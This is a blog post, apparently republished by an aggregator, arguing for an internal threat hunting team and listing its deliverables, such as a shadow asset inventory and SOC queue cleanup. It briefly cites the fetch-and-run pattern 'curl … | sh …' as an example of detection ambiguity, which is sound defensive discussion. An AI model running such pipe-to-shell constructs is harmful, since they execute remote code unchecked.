The value-proposition of building and maintaining an internal Threat Hunting team…

The value-proposition of building and maintaining an internal Threat Hunting team…
2024-8-3 07:10:38 Author: www.hexacorn.com(查看原文) 阅读量:4 收藏

The IT/cyber Buy vs. Build discussions often focus on, and present the issue at hand as a zerosum game. And in this game you MUST choose between either ‘Buy’ or ‘Build’. How limiting…

TL;DR; This article suggests that you should both ‘Buy’, and continue to ‘Build’ security… then it tells you that you should hire an internal Threat Hunting team and make this team work on the following deliverables:

TI-driven checks
opportunistic analysis
systematic analysis
precursors to alerts/dashboards
SOC/Triage workflow improvements
shadow asset inventory
low/mid fidelity event escalation
help with data governance
identification and recommendations for new security controls
identification and understanding of new attack vectors, protocols, and new defenses

Let’s focus on that strategic bit first.

The ‘Buy’ is actually a very good friend of the ‘Build’, because it indicates a progress – a milestone telling us that what used to be a whack-a-mole, makeshift/make do, mundane hack process built out of necessity, ad-hoc and not scalable, and usually ‘designed’ (patched together) by that single, super smart person on the team, and as a result immediately becoming a subject to the classic ‘single point of failure’ problem …. is now commoditized and in a way that it is this commoditization’s most democratized version, one that takes ownership of a problem in a manageable and effective way, and as a result – frees up a lot of resources that now can be used to tackle many other problems… plus more junior people can be trained to work these solutions and enter the cybersecurity career path with a minimal knowledge. Everyone wins.

Many cybersecurity solutions and services available today are pretty mature, but admittedly, and admirably, most were built on blood, sweat and tears. So… yes… be super-choosy, but buy as many as you can afford (of course, as long as you need them). And mind you, you do want to outsource as much cybersecurity work as you can today, because you still have a big chunk of other cyber work left to be done internally – and this is a type of work that cannot be outsourced (yet). Plus, the scope of this work expands very quickly, every day.

I will argue now that the term “Threat Hunting” is a misnomer.

Why?

The best deliverables of the Threat Hunting team are not necessarily ‘the threats we hunted down’ or ‘the breaches/ransomware events we have stopped’. Or, to speak the Agile enthusiasts’ language – ‘we closed 5 epics’ or ‘we killed 7 sprints’ (rolling eyes).

In my opinion the mature Threat Hunting team’s activity is far wider in scope, and I will try to cover it below…

Task #0: Detect and stop the BAD

Yeah, okay. All the mambo jumbo about all the versions of the idealized threat hunting approaches one can take to find the BAD GUYS. Walk through the Mitre Att&ck, ingest open-source TI feeds, read and ingest data from Twitter/X, Reddit, Telegram, vendor feeds, look for DFIR-collected artifacts, IOCs, research and develop, you know what I mean… and don’t forget to HYPOTHESIZE… all these juicy bits we all hype about… Then find ways to detect data leaks, insider threats, over-employed individuals and people watching Netflix, identify individuals stashing pr0n, downloading keygenz, accessing their private stuff using a company device, and/or accessing company stuff using their private devices… and so on and so forth… one way or another exposing the company to incidents…

That’s a given.

Your ROI: you find the bad guys (ideally: EARLY). Congratz 😉

Task #1: Validate asset inventory data using your superior shadow asset inventory

The absolute nightmare of a task is to explain to any IT executive that we need to validate all the data they collect about assets… They will die on a hill of the ‘we bought the solution XYZ and it generates a decent asset inventory for us, so we don’t need anything else’.

Hang on…

Believe it or not, but one of the most important tasks of an internal Threat Hunting team is to build an alternative and enriched version of the asset inventory – the one that is built using the available logs. I call it a Shadow Asset Inventory. Threat Hunting team should build it, Threat Intelligence team should own it.

Trust me.

If executed properly, this initiative will go places… the most up to date list of devices, programs, IPs they connect to, packages, SBOM, you name it… All based on what we SEE in the logs. Updated/refreshed at least every 8h or so, to accommodate for timezone changes, follow the Sun model, activities of road warriors, devices added, devices decommissioned, devices/endpoints spawn and killed in a context of cloud tenants, devices seen by one security control, but not the other, and so on and so forth…

Having multiple instances/versions of asset inventories collected from the same environment using different approaches is actually a kind of a cybersuperpower. Not only you can diff these asset collections, but you can also establish processes that rely on this regularly created diff to catch failures in many other processes – yes, including the ones that actually are responsible for building the MAIN IT asset inventories in a first place!

The ugly truth: The IT departments rarely know what is ACTUALLY present in their environments. It’s not their fault. They rely on a STATIC data. So we use all the available logs with all the DYNAMIC data to show that they need to fix their processes…

Your ROI: Every single device, software, package, IP/domain accessed for production purposes, types of specific software (f.ex. RMM), types of installations (regular, portable), etc. can be eventually accounted for, even if late in the process. Answering Vulnerability Management questions ‘Are we exposed?’ becomes much easier. And if we have to point out deficiencies in IT processes – IT departments should feel both happy an lucky – we actually got their backs!

Task #2: Support SOC by killing ‘stupid‘

Your SOC/Triage function is most likely struggling. Today.

Why?

They have already been reorganized 20 times in last 5 years, the managers are moving around, security controls keep being changed, and the priorities keep shifting around… plus we have an extra layer of regulated markets to deal with… yeah… it’s a bit of a mess.

Let the Threat Hunting team walk in — they can look at all of the SOC alerts and the metrics – they can scrutinize the alerts, look at the security controls and/or queries that generate the alerts, check and adjust assumptions, reconfigure, and in most cases — reduce the workload by as far as 40-60%!!!

I am not kidding!!!

I have done it a few times for a few different companies. The SOC queues are often overloaded and filled in with ‘phishing’ or ‘pentesting queries’ alerts coming in from internet-facing websites; and these ‘alerts’ are great examples of a detection mindset based on a rationale from 15 years ago. Today, if you are online (web site, S3 buckets, whatever), you will be scanned by many, all the time. Some scans are dodgy, some are legit. Business-wise, it would be actually worrisome not to see any scanning activity on your internet-facing web sites or other services. No matter what layer, you will see a lot of it today. We deal with it by…. ignoring it. None of this is an actionable alert unless you see actual events of interest f.ex. successful logons, webshell traffic, etc. – note : I am not just discarding them, I am assessing them from a ROI perspective. Your ROI may and probably will be different, so YMMV.

What I am signalling is, and this cannot be understated — lots of ‘stupid’ SOC work comes from a BADLY MANAGED QUEUE.

While many SOC Analysts struggle to keep up with all this non-sense, you do need someone more senior and technical to step in and bring this all down to some manageable levels. Walk through all the alerts one by one, talk to the team, understand the thought process behind the idea that led to creating these alerts in a first place, and then analyze procedures, highlight alerts that never generate TPs, consider enriching some of the data if possible, maybe use that enrichment for auto-closures, discuss moving some of the poorly performing detections to dashboards, etc…. and don’t be afraid to decommission some. There is a lot of options available, and it is a mature Threat Hunting team can help with that.

Your ROI: Substantial SOC Workload reduction. SOC loves you and sees you as a trusted partner. The mutually beneficial relationship leads to less work for everyone, and more impact. Make your Threat Hunting team your Triage/L1 team’s best friend. Your management will love the new metrics. Some of the Triage/L1 analysts will become your apprentices.

Task #3: Hunt with the ORG in mind

There is this naive misconception that companies selling security tools benefit from the access to the BIG DATA. As one can imagine: they sit on this ‘uuuge stash of data, comb it for interesting stuff on regular basis, and when they find anomalies – they immediately create detections.

This happens, and it does happen often. What may not be apparent is that the BIG DATA itself is not necessarily the best friend of the idea of finding BAD!

Yes, it does sound counter-intuitive, but let me explain.

The reason why AntiVirus idea kinda worked well in the past is because of the accuracy – majority of the AV signatures were pretty much always hitting their targets with a HIGH FIDELITY. When one victim was hit, AV companies would collect and analyze malicious samples, add signatures, and then at a cost of one child of Omelas, everyone else would end up being protected.

The NextGen AV products introduced the idea of ‘maybe’ and the EDR products introduced the idea of ‘you are the captain now’ aka telemetry – suddenly we got access to all the nitty-gritty details of how your endpoints operate. File created? We know about it. Process executed? We know about it. This data is a gold mine.

But one org’s telemetry-driven gold mine is not necessarily a gold mine for the other.

With the emergence of evasion tactics, LOLBINs, and a very wide access to telemetry from many environments a few things became quite apparent pretty quickly:

It’s hard to alert on Low and Medium fidelity alerts in general; if you apply Mitre Att&ck classification to all the events in the environment and make them ‘alertable’ you will end up alerting on a lot of FPs
A TP in one environment will be a FP in many others (think LOLBIN, but also “curl … | sh …” constructs that are usually bad, but often are good as well); there are also many companies where their very hackish 20/30-years old processes are so established in a way that they ruin it all for everyone – the more modern are using encoded powershell snippets, the more ancient are using Office macros and VBA in a ‘funny’ way, then often also relying on legacy tools like mshta and Visual Basic Script, or hiding genuine admin scripts using tools like AutoIt, WinBatch, PY2EXE, PS2EXE, PERL2EXE, etc. – I have seen enough of them to state very bluntly: ‘you MUST BE the captain now’ aka you need a TH team!
AI/ML/RBA approaches are promising, but we are far away from them delivering that ‘binary decision’ output we need for alerting purposes

Your ROI: you are the captain now 🙂

Task #4: Qualify the log quality

Threat Hunting done right focuses on data a lot. We ask: what is available? What is this log feed’s quality? How can we use it for hunting? But also, on a more basic level: is it even coming in from all the devices, is it truncated and/or corrupted, is it parseable, is it actually properly parsed? Are the fields named correctly? Is it full log or just a subset (any filters in place)? Is it actionable?

Data governance is an important part of Threat Hunting done right.

A lot of data aggregation activities happen in a limbo. Often driven by regulatory requirements, contractual agreements, legacy demands, etc. … these feeds affect the quality of data in general. Threat Hunting team can assess the usefulness of all these data feeds and suggest appropriate data ingestion policy changes. Killing the terabytes of data coming in for no reason is a very good money saving exercise!

Let me walk you through an example: a few years ago some regulatory requirements made us collect all IDS/IPS logs. Today such a requirement is like coming from a previous century – years of adding ‘IDS/IPS detections’ on a vendor side culminate in a flood of ‘detections’ and any alerts hitting on these logs simply can’t be actionable anymore. Some of these old rules still ‘catch’ requests associated with CVEs from years 2001-2009… c’mon… Unless absolutely necessary, these logs can be simply disabled.

Your ROI: less data, better quality of data, and… lots of $$$ saved!

Task #5: Identify and recommend new security controls, understand new protocols

The cybersecurity landscape is evolving very fast. It’s easy to get fixated on processing known events, or intelligence sources.

But there is always more.

DNS over HTTPS/TLS (DoH, DoT) are hard to monitor. JavaScript code can be precompiled to a V8 byte code. Email’s DKIM protocol may use DARA/DARN records. Windows 11 ARM version is now a thing. So is the controversial Rekall feature. Event Tracing for Windows (ETW) technology continues to be enhanced. The SaaS attack matrix exists.

Your Threat Hunting team should be tasked with identifying these new technologies, protocols, ideas and bringing them up to the leadership so they can be at least added to the Risk Register.

Your ROI: your management is ‘in the know’, better street creds, and maybe a better budget next year?

Task #6: Apply ‘know-your-org’ principle to LOCALIZED hunting

The EDR solutions kinda spoiled us. Lots of events to look at, lots of juice.

BUT

It is highly possible that apart from these juicy EDR logs our internal teams have an access to other solutions and logs. Many cloud, *aaS companies use their proprietary code, generate proprietary logs, and only the internal TH team can access them, connect to people who designed them, request changes/enhancements to the logs, and provide feedback that can be turned into a bug/feature request pretty quickly.

No external TH team can do this. They may claim they can, but in reality, it won’t work. If you ever worked with external vendors you know that they often work multiple clients at the same time. Their incentive is not to dig into unknown, but to recognize and close the known. This is not bad, you BUY and you cover a big chunk of ‘known’. The rest is the cool stuff – the unknown, the weird, and the unpredictable. Your internal TH will focus on that and they will eventually build a process to convert these findings, research into a custom detection pipeline.

Your ROI: you cover all the bases; whatever the BUY can cover + whatever the BUILD can cover

The conclusion

The mature threat hunting team hunts for anomalies, gaps and imperfections in the areas of People, Process and Technology. It’s a company’s security Quality Assurance/Check function.

Such objectives place it pretty close to the concept of Red Teaming seen as:

Red teams are sometimes associated with “contrarian thinking” and fighting groupthink, the tendency of groups to make and keep assumptions even in the face of evidence to the contrary.

…

When applied to intelligence work, red teaming is sometimes called alternative analysis. Alternative analysis involves bringing in fresh analysts to double-check the conclusions of another team, to challenge assumptions and make sure nothing was overlooked.

文章来源: https://www.hexacorn.com/blog/2024/08/02/the-value-proposition-of-building-and-maintaining-an-internal-threat-hunting-team/
如有侵权请联系:admin#unsafe.sh